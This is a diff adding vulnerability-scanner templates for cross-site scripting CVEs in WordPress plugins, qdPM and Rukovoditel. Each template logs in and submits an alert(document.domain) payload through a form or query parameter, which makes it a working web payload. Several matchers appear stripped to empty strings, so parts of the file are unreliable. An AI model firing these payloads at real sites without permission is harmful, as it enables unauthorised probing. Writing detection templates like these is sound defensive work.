diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml new file mode 100644 index 0000000000..fa9427a85d --- /dev/null +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-14789 + +info: + name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-14789 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-14789 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml new file mode 100644 index 0000000000..51c9b057d1 --- /dev/null +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -0,0 +1,70 @@ +id: CVE-2019-8390 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM 9.1 suffers from Cross-site Scripting (XSS) in the search[keywords] parameter. + reference: + - https://www.exploit-db.com/exploits/46399/ + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-8390 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + max-request: 3 + tags: cve,cve2019,xss,qdpm,authenticated,edb + +http: + - raw: + - | + GET /index.php/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer= + + - | + POST /index.php/users HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + search[keywords]=e">&search_by_extrafields[]=9 + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'alert alert-info alert-search-result' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'name="login\[_csrf_token\]" value="(.*?)"' + internal: true diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml new file mode 100644 index 0000000000..ad8ee4f768 --- /dev/null +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-19515 + +info: + name: qdPM 9.1 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\install\modules\database_config.php. + reference: + - https://topsecalphalab.github.io/CVE/qdPM9.1-Installer-Cross-Site-Scripting + - http://qdpm.net/download-qdpm-free-project-management + - https://nvd.nist.gov/vuln/detail/CVE-2020-19515 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-19515 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2020,xss,qdpm,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php?step=database_config&db_error=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'qdPM' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml new file mode 100644 index 0000000000..77ae78f15d --- /dev/null +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35984 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35984 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35984 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml new file mode 100644 index 0000000000..06f833058c --- /dev/null +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35985 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Global Lists" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35985 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35985 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml new file mode 100644 index 0000000000..a532006a00 --- /dev/null +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-35986 + +info: + name: Rukovoditel <= 2.7.2 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35986 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..32b3c05c29 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml new file mode 100644 index 0000000000..ccecc02849 --- /dev/null +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-4295 + +info: + name: Show all comments < 7.0.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + reference: + - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56 + - https://nvd.nist.gov/vuln/detail/CVE-2022-4295 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-4295 + cwe-id: CWE-79 + metadata: + verified: true + publicwww-query: /wp-content/plugins/show-all-comments-in-one-page + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Select ")' + condition: and diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml new file mode 100644 index 0000000000..a6bb6ff6d1 --- /dev/null +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-43164 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43164 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43164 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml new file mode 100644 index 0000000000..40009003ab --- /dev/null +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43165 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + reference: + - https://github.com/anhdq201/rukovoditel/issues/5 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43165 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml new file mode 100644 index 0000000000..850177753b --- /dev/null +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43166 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + reference: + - https://github.com/anhdq201/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43166 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml new file mode 100644 index 0000000000..c540b4ae99 --- /dev/null +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43167 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/7 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43167 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml new file mode 100644 index 0000000000..d9e2414971 --- /dev/null +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43169 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + reference: + - https://github.com/anhdq201/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43169 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43169 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml new file mode 100644 index 0000000000..3487ba0aea --- /dev/null +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43170 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + reference: + - https://github.com/anhdq201/rukovoditel/issues/6 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43170 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml new file mode 100644 index 0000000000..7c5d638e81 --- /dev/null +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43185 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43185 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml new file mode 100644 index 0000000000..cdde910d64 --- /dev/null +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44944 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/14 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44944 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml new file mode 100644 index 0000000000..20e40fab41 --- /dev/null +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44946 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/15 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 